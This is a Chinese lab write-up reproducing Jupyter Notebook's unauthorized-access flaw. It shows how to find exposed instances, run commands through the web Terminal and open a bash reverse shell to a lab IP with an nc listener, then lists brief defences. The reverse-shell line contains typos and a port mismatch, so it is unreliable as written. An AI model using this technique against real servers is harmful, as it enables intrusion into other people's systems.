七天啊
七天啊

漏洞复现----25、Jupyter Notebook 未授权访问漏洞

文章目录

  • Jupyter Notebook 未授权访问漏洞
  • 一、运行环境
  • 二、漏洞复现
  • 三、漏洞防御

Jupyter Notebook 未授权访问漏洞

Jupyter Notebook(此前被称为 IPython notebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行 40 多种编程语言。Jupyter Notebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示。

如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。

一、运行环境

docker-compose up -d
访问:ip:8888

二、漏洞复现

在shadan和FOFA等网络空间搜索引擎中搜索,可发现大量使用Jupyter Notebook的系统。
漏洞复现----25、Jupyter Notebook 未授权访问漏洞_第1张图片
1、直接访问http://192.168.209.138:8888,并没有进行身份校验,未授权可以直接访问。
2、利用Terminal可以直接执行系统命令
漏洞复现----25、Jupyter Notebook 未授权访问漏洞_第2张图片
漏洞复现----25、Jupyter Notebook 未授权访问漏洞_第3张图片
3、

在命令行执行:bahs -i > &/dev/tcp/192.168.209.128/44444 0>&1。
监听机器执行:nc -lvvp 4444

在这里插入图片描述

漏洞复现----25、Jupyter Notebook 未授权访问漏洞_第4张图片

三、漏洞防御

1、开启身份验证, 防止止未经授权用用户访问
2、访问控制策略略, 限制IP访问, 绑定固定IP

你可能感兴趣的:(#,漏洞复现,网络安全技术,未授权访问)

  • MXTU MAX 苹果cmsv10模板 仿毒舌自适应主题/短视X体验版完全开源 希希分享 软希网58soho_cn源码资源仿毒舌自适应主题/
    基于MxonePro二开的主题,全开源未加密。MXTUMAX仿毒舌苹果CMS影视自适应主题主题说明:1、将mxtheme目录放置根目录|将mxpro目录放置template文件夹中2、苹果cms后台-系统-网站参数配置-网站模板-选择mxpro模板目录填写html3、网站模板选择好之后一定要先访问前台,然后再进入后台设置4、主题后台地址:MXTUMAX图图主题,/admin.php/admin/m
  • redis 如何保证缓存和数据库一致性?解决策略如下 Foolforuuu 缓存数据库redis
    Redis与数据库的数据保持一致,传统策略是先读缓存,未命中则读数据库并回填缓存,但方式这种维护成本较高。下面是几种传统常见的策略及其优缺点:【策略1】先写MySQL。成功后,更新或删除Redis中的对应数据。优点:简单易实现。缺点:存在短暂的不一致。【策略2】先写Redis。异步或定时将Redis数据同步到MySQL。优点:提升写性能。缺点:同步延迟可能导致数据丢失。【策略3】读Redis,命
  • 以太网协议介绍 归宿688 软件开发自动驾驶网络协议
    目录一.以太网主要协议关系介绍二.协议介绍及帧结构2.1媒体访问控制子层协议MAC2.2地址解析协议ARP2.2.1ARP帧结构2.2.2ARP协议工作原理2.3网际互连协议IP2.3.1IP协议帧2.3.2IP数据报分片重组2.4互联网控制消息协议ICMP2.5用户数据报协议UDP2.6传输控制协议TCP一.以太网主要协议关系介绍  网络结构可以分为五层,自底向上依次为:物理层、数据链路层、网络
  • 钉钉酷应用开发 死神黑夜降临 项目酷应用
    钉钉酷应用开发注意事项背景介绍注意事项1开发注意2授权注意3上线注意背景介绍钉钉针对应用进行微化的一种升级,与应用是绑定一起的。注意事项1开发注意钉钉应用分为三方应用和企业内部应用,酷应用依托于钉钉应用,故其也存在三方应用和内部应用的区分二者的不同点,三方酷应用想在手机端调试或者电脑端调试,需要提交发布申请,提交后,填写的访问地址链接不能修改;内部应用不存在这个问题,是可以随时修改的,这点很重要,
  • 勒索病毒攻击:如何应对和恢复 测试者家园 网络安全软件测试质量效能web安全安全网络运维项目管理病毒
    近年来,勒索病毒(Ransomware)已经成为全球信息安全领域最具破坏力的威胁之一。无论是个人用户,还是大中型企业,甚至政府机构,勒索病毒的攻击频率和破坏性日益增加。2020年及2021年,勒索病毒攻击不仅数量激增,且其攻击手法、目标和传播方式也变得更加复杂、精密和具有针对性。勒索病毒是一种恶意软件,它通过加密受害者的文件、系统或网络,迫使受害者支付赎金以恢复访问权限。虽然支付赎金可能暂时解决问
  • DeepSeek 助力 Vue 开发:打造丝滑的导航栏(Navbar) 宝码香车 #DeepSeekvue.js前端javascriptecmascriptDeepSeek
    前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏+关注哦目录DeepSeek助力Vue开发:打造丝滑的导航栏(Navbar)前言页面效果指令输入属性定义1.导航栏样式相关2.导航项相关3.响应式相关4.对齐方式相关事件定义1.导航项点击事件2.菜单折叠切换事件其他建议1.可访问性2.动画效果3.图标支
  • C#03项目——Typeof的用法 yue008 C#c#TypeofEnvironmentMethodInfo
    知识点Typeof。获取类型对象,然后获取类型的方法。可适用于窗体控件的选择MethodInfo。发现方法的属性并提供对方法元数据的访问。本项目涉及的属性有属性/方法Name获取当前成员的名称。是属性GetParameters获取指定的方法或构造函数的参数。是方法Environment。提供有关当前环境和平台的信息以及操作它们的方法。此类不能被继承。属性/方法NewLine获取为此环境定义的换行字
  • Kubernetes的Ingress 资源是什么? 硅基创想家 #Kubernetes实战与经验kubernetes容器云原生
    在Kubernetes中,Ingress资源是一种用于管理集群外部对内部服务访问的API对象,主要用于将不同的外部请求路由到集群内的不同服务,以下是关于它的详细介绍:定义与作用Ingress资源定义了从集群外部到内部服务的HTTP和HTTPS路由规则。通过Ingress,可以将多个不同域名或不同路径的请求,根据定义的规则,导向到集群内不同的Kubernetes服务,从而实现对集群内服务的统一外部访
  • 使用 Rebuff 进行Prompt Injection的检测和防护 scaFHIO promptpython
    技术背景介绍在AI应用领域,PromptInjection(PI)攻击是一种通过恶意输入操控AI模型行为的攻击方式。这可能导致严重的安全问题,比如数据泄露、执行未授权的操作等。因此,检测和防护PI攻击对保障AI系统安全至关重要。Rebuff是一个自硬化的PromptInjection检测器,通过多阶段防御机制来保护AI应用免受PI攻击。本文将介绍Rebuff的核心原理、代码实现及其在实际开发中的应
  • Linux sftp 使用详解 linux
    简介SFTP(安全文件传输协议)是一种通过网络在计算机之间传输文件的安全方法。它是SSH协议的一部分,这意味着它在文件传输过程中提供加密通信。SFTP通常用于安全文件管理、远程文件访问和远程文件编辑。常用命令sftpuser@host:通过SFTP连接到远程服务器ls:列出当前远程目录中的文件cd:更改远程目录pwd:显示当前远程目录lcd:更改本地目录lpwd:显示当前本地目录put:将文件从本
  • DeepSeek指导手册从入门到精通 向画 功能javac语言lualaraveleclipsegithubvue.js
    第一章:准备篇(30分钟上手)1.1三分钟创建你的AI伙伴步骤详解访问官网:在浏览器输入「www.deepseek.com」。注册账号:点击右上角「笑脸图标」,选择「邮箱/手机注册」(建议使用常用邮箱)。验证身份:查看收件箱找到验证邮件,点击蓝色确认按钮(找不到可检查垃圾箱)。首次登录:输入密码时建议使用「大小写字母+数字」组合(例如:Deep2024@seek)。避坑指南如果遇到验证码不显示,尝
  • 优化Java中锁的性能 BrchCpp java开发语言编程
    在Java编程中,锁(Lock)是一种用于控制多线程并发访问共享资源的重要机制。然而,使用不当或性能较差的锁实现可能会导致性能瓶颈和线程竞争。本文将介绍一些优化Java中锁性能的方法,并提供相应的源代码示例。减少锁的粒度:锁的粒度越小,允许并发执行的线程数量就越多。因此,在设计多线程应用程序时,应尽量将锁的范围限定在最小必要范围内。例如,如果只需要保护某个特定字段的访问,而不是整个对象,可以使用细
  • Java中的锁 向画 javajava开发语言
    这里举例6种悲观锁和乐观锁是两种不同的并发控制策略,用于解决多线程或多进程环境下对共享资源访问时可能出现的数据不一致问题。下面分别介绍它们的概念、实现方式以及代码示例。悲观锁概念悲观锁假设在整个数据处理过程中,会有其他线程或进程来修改数据,因此在操作数据之前会先对数据进行加锁,确保在自己操作期间其他线程无法访问和修改该数据,直到操作完成并释放锁。这种锁的策略比较“悲观”,常用于写操作频繁的场景。实
  • RESTful API与Spring MVC注解结合详解 龙阳ω springmvcrestfulspringmvcjava
    1、RESTfulAPIRESTfulAPI,全称为RepresentationalStateTransfer(表述性状态转移)的API,是现代Web服务中最为流行的架构风格之一。其核心思想是将网络中的资源抽象为一系列URL,客户端通过HTTP协议对这些URL进行访问和操作,从而实现资源的获取、创建、更新和删除等操作。使用HTTP协议中的方法(GET、POST、PUT、DELETE等)来表示对资源
  • vue面试题|[2025-1-10] ○陈 vue面试题vue.jsjavascript前端
    1.vue和jquery的区别是什么?1.原理不同vue就是数据绑定;jq是先获取dom再处理2.着重点不同vue是数据驱动,jq是着重于页面3.操作不同4.未来发展不同2.vuex的响应式处理vuex是vue的状态管理工具vue中可以直接触发methods中的方法,vuex是不可以的。处理异步,当触发事件的时候,会通过dispatch来访问actions中的方法,actions中的commit会
  • 使用LangChain与Clarifai模型进行交互 vaidfl langchain交互python
    在现代AI应用开发中,Clarifai提供了一个完整的AI生命周期管理平台,包括数据探索、数据标注、模型训练、评估和推理。本文将探讨如何使用LangChain库与Clarifai的模型进行交互。技术背景介绍Clarifai是一个全面的AI平台,专注于模型的构建和部署。要开始使用Clarifai,你需要一个账户和个人访问令牌(PAT)。确保先在Clarifai获取或创建你的PAT。核心原理解析通过L
  • 【c++】容器:vector、list、map 大姨妈V c++【c++从入门到精通】学习笔记
    【c++】容器1.容器2.顺序容器3.向量4.双向链表5.关联容器6.映射参考:《c++从入门到精通》人民邮电出版社标准模板库STL的c++最有特色、最实用的部分之一。标准模板库包含了容器类、迭代器和算法三部分。容器:容器就是可以用于存放各种类型数据的数据结构。迭代器:迭代器可依次存取容器中的元素,在C++中称迭代器为指针,它们提供了访问容器、序列中每个元素的方法。算法:是用来操作容器中的元素的函
  • ubuntu22.04安装tigervnc使用vnc进行访问 大新新大浩浩 运维知识-ubuntu服务器linux运维
    文章目录前言一、部署步骤1.安装图形化2.安装tigervnc3.打开vnc所需端口的访问限制4.建立vnc访问前言ubuntu22.04安装使用vnc进行访问一、部署步骤1.安装图形化ubuntu的图形化环境很多,我这里就不赘述了2.安装tigervncaptinstall-ytigervnc-standalone-servertigervnc-common3.打开vnc所需端口的访问限制我这里
  • 模型保存、训练与验证 钰见梵星 小土堆PyTorch深度学习深度学习人工智能
    模型保存、训练与验证网络模型的保存与读取在PyTorch中,模型的保存与加载有两种主要方式:保存&加载完整模型(包括网络结构和参数)只保存&加载模型参数(推荐方式)可以直接跳过看最后几行。PyTorch提供torch.save()方法来保存模型,可以选择保存整个模型结构或只保存参数。保存整个模型importtorchfromtorchvisionimportmodels#加载VGG16模型(未使用
  • STL-向量Vector 蓝桉_An C++STL全集c++开发语言
    一、简化概念变长数组,倍增思想:和普通数组思想一样,只是长度可以根据需要进行更改,能自动扩大到当前数组大小的两倍(大部分情况下是两倍)使用时需包含头文件,#include其实质是一个动态数组,可以随时添加或删除元素;支持随机访问、在末尾添加元素、在任意位置插入或删除元素等操作,但在中间插入或删除元素会比较慢。二、基本定义vector变量名(长度,初值),详细定义如代码//省略长度和初始值vecto
  • HarmonyOS NEXT开发:通过线性容器实现数组指导 「已注销」 鸿蒙开发HarmonyOSOpenHarmony开发语言前端服务器harmonyos华为鸿蒙鸿蒙系统
    线性容器实现能按顺序访问的数据结构,其底层主要通过数组实现,包括ArrayList、Vector、List、LinkedList、Deque、Queue、Stack七种。线性容器,充分考虑了数据访问的速度,运行时(Runtime)通过一条字节码指令就可以完成增、删、改、查等操作。ArrayListArrayList即动态数组,可用来构造全局的数组对象。当需要频繁读取集合中的元素时,推荐使用Arra
  • Dtcms修改PC站分享到手机端后访问打开手机版的当前页面 一包烟电脑面前做一天 webdtcms
    dtcms框架中自带的功能是在手机端访问域名,自动跳转到手机版的首页。所以分享后自动跳转手机版当前页面需要自己调整,代码如下:在main目录下的common.js中修改JS判断即可:if(getCookie('m2wcookie')!='1'&&browserRedirect()){//PC跳转移动端varhostname=window.location.hostname;varpathname=
  • DeepSeek的实用方法DeepSeek+kimi生成PPT C_V_Better AI人工智能人工智能pptai
    在人工智能领域,DeepSeek和KimiAI作为强大的语言模型,为开发者和普通用户提供了丰富的功能。本文将详细介绍DeepSeek的实用方法,以及如何结合KimiAI生成PPT,帮助您快速上手并发挥其强大能力。一、DeepSeek的使用方法(一)注册与登录访问官网:打开浏览器,输入DeepSeek官网。注册账号:点击“注册”按钮,填写邮箱地址、设置密码,并完成邮箱验证。登录:注册成功后,使用注册
  • SSH/RDP 无法访问?云服务器让远程管理更简单 Anna_Tong ssh服务器运维阿里云安全组配置云服务器运维远程管理优化
    在日常运维和管理云服务器时,远程连接(SSH访问Linux服务器,RDP访问Windows服务器)是不可或缺的操作。然而,不少用户在使用阿里云ECS或其他云服务器时,会遇到远程连接失败、超时或拒绝访问的问题,导致无法正常管理服务器,甚至影响业务运行。那么,是什么原因导致SSH/RDP连接失败?如何快速排查并解决问题?云服务器又能如何帮助优化远程管理体验?本文将带你详细解析,确保你的服务器随时可控、
  • 上位机知识篇---sbit、bit、sfr Ronin-Lotus 上位机操作篇程序代码篇嵌入式硬件篇单片机嵌入式硬件csbitbitsfr蓝桥杯
    文章目录前言1.sbit的使用语法特点作用范围存储位置用途示例代码2.bit的使用语法特点作用范围存储位置用途示例代码3.sbit与bit的区别4.综合示例5.注意事项sbit的适用范围:bit的存储限制编译器支持6.总结sbitbit7.sfr的使用1.sfr的语法2.sfr的作用访问硬件资源提高代码可读性简化代码:3.8051单片机中常见的SFR4.sfr的使用示例示例1:控制GPIO端口示例
  • #default=“{ row }“ 和 #default=“scope“的区别 BillKu vue.js前端javascript
    在ElementPlus的中,#default="{row}"和#default="scope"本质上是相同的概念,区别在于变量解构的写法和可访问属性的范围。以下是具体区别:1.写法区别写法特点#default="scope"接收完整的插槽作用域对象#default="{row}"直接解构出row属性(ES6对象解构语法)2.可访问属性假设数据对象结构为:{row:{},//当前行数据$index
  • 合作伙伴中心Partner Center中添加了Copilot预览版 xueyunshengling 微软合作伙伴计划合作伙伴中心copilotCopilot预览版
    目录一、引言二、Copilot功能概述2.1Copilot简介2.2Copilot的核心功能2.3Copilot的访问和使用三、Copilot的使用方法3.1Copilot功能区域3.2Copilot使用示例3.2.1编写有效提示3.2.2使用反馈循环四、负责任的人工智能4.1Copilot结果的可靠性4.2意外或冒犯性内容的处理4.3Copilot数据收集五、总结一、引言合作伙伴中心(预览版)中
  • C++中的线程同步方式 凌云行者 C++c++线程同步互斥锁条件变量信号量屏障原子类型
    线程同步方式互斥锁概述:用于保护临界区,确保同一时间只有一个线程可以访问共享资源。常见的互斥锁有std::mutex,std::lock_guard和std::unique_lockmutex概述:用于管理多个线程对共享资源的互斥访问,防止数据竞争和并发问题基础用法示例:#include#include#includeintcnt=0;//共享变量资源std::mutexmtx;//共享变量的互斥
  • std::unique_lock<std::mutex> lock(_mutexSwathDone); Ring__Rain c++
    std::unique_locklock(_mutexSwathDone);是C++中用于管理互斥锁(mutex)的常见用法。以下是详细解析:1.代码作用std::mutex:这是C++标准库中的互斥锁类,用于保护共享资源,防止多线程同时访问导致数据竞争。std::unique_lock:这是一个RAII(资源获取即初始化)风格的锁管理类,用于自动管理互斥锁的加锁和解锁。这行代码的作用是:在构造l
  • 国密算法SM1 SM2 SM3 SM4 SM9 象话 算法国密算法SM2SM3SM4
    一、概述SM1-无具体实现SM1作为一种对称加密算法,由于其算法细节并未公开,且主要在中国国内使用,因此在国际通用的加密库(如BouncyCastle)中并不直接支持SM1算法。SM1算法的具体实现涉及国家密码管理局的规范,通常需要使用国家指定的安全模块(如SSF33、SC1/SC2卡)或通过国家认证的加密硬件/软件产品来实现。不过,如果你有合法授权并且在合规的环境下需要使用SM1算法,可能需要依
  • ios内付费 374016526 ios内付费
    近年来写了很多IOS的程序,内付费也用到不少,使用IOS的内付费实现起来比较麻烦,这里我写了一个简单的内付费包,希望对大家有帮助。   具体使用如下: 这里的sender其实就是调用者,这里主要是为了回调使用。 [KuroStoreApi kuroStoreProductId:@"产品ID" storeSender:self storeFinishCallBa
  • 20 款优秀的 Linux 终端仿真器 brotherlamp linuxlinux视频linux资料linux自学linux教程
      终端仿真器是一款用其它显示架构重现可视终端的计算机程序。换句话说就是终端仿真器能使哑终端看似像一台连接上了服务器的客户机。终端仿真器允许最终用户用文本用户界面和命令行来访问控制台和应用程序。(LCTT 译注:终端仿真器原意指对大型机-哑终端方式的模拟,不过在当今的 Linux 环境中,常指通过远程或本地方式连接的伪终端,俗称“终端”。) 你能从开源世界中找到大量的终端仿真器,它们
  • Solr Deep Paging(solr 深分页) eksliang solr深分页solr分页性能问题
    转载请出自出处:http://eksliang.iteye.com/blog/2148370 作者:eksliang(ickes) blg:http://eksliang.iteye.com/ 概述 长期以来,我们一直有一个深分页问题。如果直接跳到很靠后的页数,查询速度会比较慢。这是因为Solr的需要为查询从开始遍历所有数据。直到Solr的4.7这个问题一直没有一个很好的解决方案。直到solr
  • 数据库面试题 18289753290 面试题 数据库
    1.union ,union all 网络搜索出的最佳答案: union和union all的区别是,union会自动压缩多个结果集合中的重复结果,而union all则将所有的结果全部显示出来,不管是不是重复。 Union:对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序; Union All:对两个结果集进行并集操作,包括重复行,不进行排序; 2.索引有哪些分类?作用是
  • Android TV屏幕适配 酷的飞上天空 android
    先说下现在市面上TV分辨率的大概情况 两种分辨率为主 1.720标清,分辨率为1280x720. 屏幕尺寸以32寸为主,部分电视为42寸 2.1080p全高清,分辨率为1920x1080 屏幕尺寸以42寸为主,此分辨率电视屏幕从32寸到50寸都有   适配遇到问题,已1080p尺寸为例: 分辨率固定不变,屏幕尺寸变化较大。 如:效果图尺寸为1920x1080,如果使用d
  • Timer定时器与ActionListener联合应用 永夜-极光 java
    功能:在控制台每秒输出一次   代码: package Main; import javax.swing.Timer; import java.awt.event.*; public class T { private static int count = 0; public static void main(String[] args){
  • Ubuntu14.04系统Tab键不能自动补全问题解决 随便小屋 Ubuntu 14.04
    Unbuntu 14.4安装之后就在终端中使用Tab键不能自动补全,解决办法如下:   1、利用vi编辑器打开/etc/bash.bashrc文件(需要root权限) sudo vi /etc/bash.bashrc  接下来会提示输入密码 2、找到文件中的下列代码 #enable bash completion in interactive shells #if
  • 学会人际关系三招 轻松走职场 aijuans 职场
    要想成功,仅有专业能力是不够的,处理好与老板、同事及下属的人际关系也是门大学问。如何才能在职场如鱼得水、游刃有余呢?在此,教您简单实用的三个窍门。   第一,多汇报 最近,管理学又提出了一个新名词“追随力”。它告诉我们,做下属最关键的就是要多请示汇报,让上司随时了解你的工作进度,有了新想法也要及时建议。不知不觉,你就有了“追随力”,上司会越来越了解和信任你。   第二,勤沟通 团队的力
  • 《O2O:移动互联网时代的商业革命》读书笔记 aoyouzi 读书笔记
    移动互联网的未来:碎片化内容+碎片化渠道=各式精准、互动的新型社会化营销。   O2O:Online to OffLine 线上线下活动 O2O就是在移动互联网时代,生活消费领域通过线上和线下互动的一种新型商业模式。   手机二维码本质:O2O商务行为从线下现实世界到线上虚拟世界的入口。   线上虚拟世界创造的本意是打破信息鸿沟,让不同地域、不同需求的人
  • js实现图片随鼠标滚动的效果 百合不是茶 JavaScript滚动属性的获取图片滚动属性获取页面加载
    1,获取样式属性值 top 与顶部的距离 left 与左边的距离 right 与右边的距离 bottom 与下边的距离 zIndex 层叠层次     例子:获取左边的宽度,当css写在body标签中时 <div id="adver" style="position:absolute;top:50px;left:1000p
  • ajax同步异步参数async bijian1013 jqueryAjaxasync
            开发项目开发过程中,需要将ajax的返回值赋到全局变量中,然后在该页面其他地方引用,因为ajax异步的原因一直无法成功,需将async:false,使其变成同步的。         格式: $.ajax({ type: 'POST', ur
  • Webx3框架(1) Bill_chen eclipsespringmaven框架ibatis
    Webx是淘宝开发的一套Web开发框架,Webx3是其第三个升级版本;采用Eclipse的开发环境,现在支持java开发; 采用turbine原型的MVC框架,扩展了Spring容器,利用Maven进行项目的构建管理,灵活的ibatis持久层支持,总的来说,还是一套很不错的Web框架。 Webx3遵循turbine风格,velocity的模板被分为layout/screen/control三部
  • 【MongoDB学习笔记五】MongoDB概述 bit1129 mongodb
    MongoDB是面向文档的NoSQL数据库,尽量业界还对MongoDB存在一些质疑的声音,比如性能尤其是查询性能、数据一致性的支持没有想象的那么好,但是MongoDB用户群确实已经够多。MongoDB的亮点不在于它的性能,而是它处理非结构化数据的能力以及内置对分布式的支持(复制、分片达到的高可用、高可伸缩),同时它提供的近似于SQL的查询能力,也是在做NoSQL技术选型时,考虑的一个重要因素。Mo
  • spring/hibernate/struts2常见异常总结 白糖_ Hibernate
    Spring ①ClassNotFoundException: org.aspectj.weaver.reflect.ReflectionWorld$ReflectionWorldException 缺少aspectjweaver.jar,该jar包常用于spring aop中   ②java.lang.ClassNotFoundException: org.sprin
  • jquery easyui表单重置(reset)扩展思路 bozch formjquery easyuireset
    在jquery easyui表单中 尚未提供表单重置的功能,这就需要自己对其进行扩展。 扩展的时候要考虑的控件有: combo,combobox,combogrid,combotree,datebox,datetimebox 需要对其添加reset方法,reset方法就是把初始化的值赋值给当前的组件,这就需要在组件的初始化时将值保存下来。 在所有的reset方法添加完毕之后,就需要对fo
  • 编程之美-烙饼排序 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; /* *《编程之美》的思路是:搜索+剪枝。有点像是写下棋程序:当前情况下,把所有可能的下一步都做一遍;在这每一遍操作里面,计算出如果按这一步走的话,能不能赢(得出最优结果)。 *《编程之美》上代码有很多错误,且每个变量的含义令人费解。因此我按我的理解写了以下代码: */
  • Struts1.X 源码分析之ActionForm赋值原理 chenbowen00 struts
    struts1在处理请求参数之前,首先会根据配置文件action节点的name属性创建对应的ActionForm。如果配置了name属性,却找不到对应的ActionForm类也不会报错,只是不会处理本次请求的请求参数。 如果找到了对应的ActionForm类,则先判断是否已经存在ActionForm的实例,如果不存在则创建实例,并将其存放在对应的作用域中。作用域由配置文件action节点的s
  • [空天防御与经济]在获得充足的外部资源之前,太空投资需有限度 comsci 资源
          这里有一个常识性的问题:       地球的资源,人类的资金是有限的,而太空是无限的.....       就算全人类联合起来,要在太空中修建大型空间站,也不一定能够成功,因为资源和资金,技术有客观的限制.... &
  • ORACLE临时表—ON COMMIT PRESERVE ROWS daizj oracle临时表
    ORACLE临时表 转 临时表:像普通表一样,有结构,但是对数据的管理上不一样,临时表存储事务或会话的中间结果集,临时表中保存的数据只对当前 会话可见,所有会话都看不到其他会话的数据,即使其他会话提交了,也看不到。临时表不存在并发行为,因为他们对于当前会话都是独立的。 创建临时表时,ORACLE只创建了表的结构(在数据字典中定义),并没有初始化内存空间,当某一会话使用临时表时,ORALCE会
  • 基于Nginx XSendfile+SpringMVC进行文件下载 denger 应用服务器Webnginx网络应用lighttpd
        在平常我们实现文件下载通常是通过普通 read-write方式,如下代码所示。 @RequestMapping("/courseware/{id}") public void download(@PathVariable("id") String courseID, HttpServletResp
  • scanf接受char类型的字符 dcj3sjt126com c
    /* 2013年3月11日22:35:54 目的:学习char只接受一个字符 */ # include <stdio.h> int main(void) { int i; char ch; scanf("%d", &i); printf("i = %d\n", i); scanf("%
  • 学编程的价值 dcj3sjt126com 编程
    发一个人会编程, 想想以后可以教儿女, 是多么美好的事啊, 不管儿女将来从事什么样的职业, 教一教, 对他思维的开拓大有帮助   像这位朋友学习:   http://blog.sina.com.cn/s/articlelist_2584320772_0_1.html   VirtualGS教程 (By @林泰前): 几十年的老程序员,资深的
  • 二维数组(矩阵)对角线输出 飞天奔月 二维数组
    今天在BBS里面看到这样的面试题目,   1,二维数组(N*N),沿对角线方向,从右上角打印到左下角如N=4: 4*4二维数组  { 1 2 3 4 } { 5 6 7 8 } { 9 10 11 12 } {13 14 15 16 } 打印顺序  4 3 8 2 7 12 1 6 11 16 5 10 15 9 14 13 要
  • Ehcache(08)——可阻塞的Cache——BlockingCache 234390216 并发ehcacheBlockingCache阻塞
    可阻塞的Cache—BlockingCache          在上一节我们提到了显示使用Ehcache锁的问题,其实我们还可以隐式的来使用Ehcache的锁,那就是通过BlockingCache。BlockingCache是Ehcache的一个封装类,可以让我们对Ehcache进行并发操作。其内部的锁机制是使用的net.
  • mysqldiff对数据库间进行差异比较 jackyrong mysqld
      mysqldiff该工具是官方mysql-utilities工具集的一个脚本,可以用来对比不同数据库之间的表结构,或者同个数据库间的表结构    如果在windows下,直接下载mysql-utilities安装就可以了,然后运行后,会跑到命令行下: 1) 基本用法    mysqldiff --server1=admin:12345
  • spring data jpa 方法中可用的关键字 lawrence.li javaspring
    spring data jpa 支持以方法名进行查询/删除/统计。 查询的关键字为find 删除的关键字为delete/remove (>=1.7.x) 统计的关键字为count (>=1.7.x)   修改需要使用@Modifying注解 @Modifying @Query("update User u set u.firstna
  • Spring的ModelAndView类 nicegege spring
    项目中controller的方法跳转的到ModelAndView类,一直很好奇spring怎么实现的? /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * yo
  • 搭建 CentOS 6 服务器(13) - rsync、Amanda rensanning centos
    (一)rsync Server端 # yum install rsync # vi /etc/xinetd.d/rsync service rsync { disable = no flags = IPv6 socket_type = stream wait
  • Learn Nodejs 02 toknowme nodejs
    (1)npm是什么 npm is the package manager for node 官方网站:https://www.npmjs.com/ npm上有很多优秀的nodejs包,来解决常见的一些问题,比如用node-mysql,就可以方便通过nodejs链接到mysql,进行数据库的操作 在开发过程往往会需要用到其他的包,使用npm就可以下载这些包来供程序调用 &nb
  • Spring MVC 拦截器 xp9802 spring mvc
    Controller层的拦截器继承于HandlerInterceptorAdapter HandlerInterceptorAdapter.java  1  public   abstract   class  HandlerInterceptorAdapter  implements  HandlerIntercep
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他